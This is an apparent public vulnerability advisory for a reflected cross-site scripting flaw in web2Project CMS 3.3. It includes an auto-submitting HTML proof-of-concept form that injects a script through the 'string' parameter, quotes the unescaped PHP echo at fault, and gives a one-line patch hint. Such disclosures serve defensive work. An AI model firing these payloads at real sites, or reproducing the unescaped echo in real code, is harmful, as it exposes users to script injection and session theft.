___________________________________________________
|
| Exploit Title: web2Project cms Cross Site Scripting(XSS)
| Exploit Author: Ashiyane Digital security Team
| Vendor Homepage : https://web2project.net/
| Software Link: https://github.com/web2project/web2project/archive/version3.3.tar.gz
| Version: 3.3
| Date: 2017-11-06
| Category: Webapps
| Tested on: Kali-Linux /FireFox
|__________________________________________________
|
| Exploit :
|
| <html>
| <body onload="document.exploit.submit()">
| <form method="get" action="http://127.0.0.1/1/web2project-version3.3/
| lib/PEAR/HTML/BBCodeParser/example/parser.php ">
| <input type="hidden" name="string" value=""/><script>alert(1)</script>" />
| </form>
| </body>
| </html>
|
|__________________________________________________
|
| Vulnerable method :
| $_GET
|
| Vulnerable File:
| http://TARGET/path/lib/PEAR/HTML/BBCodeParser/example/parser.php
|
| Vulnerable code:
|
| line 36 :
| <textarea cols='45' rows='10' name='string'><?php echo @$_GET['string']?></textarea>
|__________________________________________________
|
| patch:
|
| For fix this vulnerability you use htmlspecialchars() function .
|__________________________________________________
|
| Discovered By : M.R.S.L.Y
|__________________________________________________